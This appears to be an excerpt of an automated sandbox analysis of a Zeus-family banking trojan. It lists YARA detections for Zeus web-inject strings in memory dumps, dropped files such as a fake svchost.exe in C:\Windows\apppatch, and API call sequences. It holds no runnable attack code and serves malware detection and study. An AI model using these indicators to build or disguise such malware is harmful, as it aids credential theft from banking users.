Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e2c0000.39.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.55.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.81.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.73.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1742494940.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1945983887.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1993648247.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973545656.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1951729466.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1727160280.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1989210596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1953838270.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1952570956.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1987381593.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1833788305.000000000E440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990556597.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990141474.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1908832402.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1951475762.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1785353535.000000000E040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1992609044.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1986892750.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990784725.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973353596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1993059041.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1768859542.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1810638614.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1963515369.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973821759.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1986550806.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972618902.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964073452.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972290685.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1945209264.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1819357336.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1939680900.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1965323651.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1849125917.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991341795.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964333284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1987592676.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1936202051.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1877311393.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1994177586.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972865082.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1779871289.000000000E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: uavINoSIQh.exe PID: 7384, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 7444, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4084, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2604, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6304, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4628, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6964, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5632, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2772, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2936, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1756, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1812, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 1900, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5612, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 3964, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Yara match, File source: 0.3.uavINoSIQh.exe.597700.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.uavINoSIQh.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.uavINoSIQh.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.svchost.exe.884000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: uavINoSIQh.exe PID: 7384, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 7444, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02643A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_026479E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 5_2_01323A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 6_2_013E3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, Code function: 8_2_01513A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Code function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\uavINoSIQh.exe, Code function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\uavINoSIQh.exe, File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\uavINoSIQh.exe, File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01512BA08_2_01512BA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154CBA08_2_0154CBA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015442508_2_01544250
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015582138_2_01558213
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0153F2D08_2_0153F2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154B2D08_2_0154B2D0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152D5708_2_0152D570
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01545CD08_2_01545CD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154FCF08_2_0154FCF0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154A4808_2_0154A480
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015544A08_2_015544A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0154BF408_2_0154BF40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015387808_2_01538780
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_015517808_2_01551780
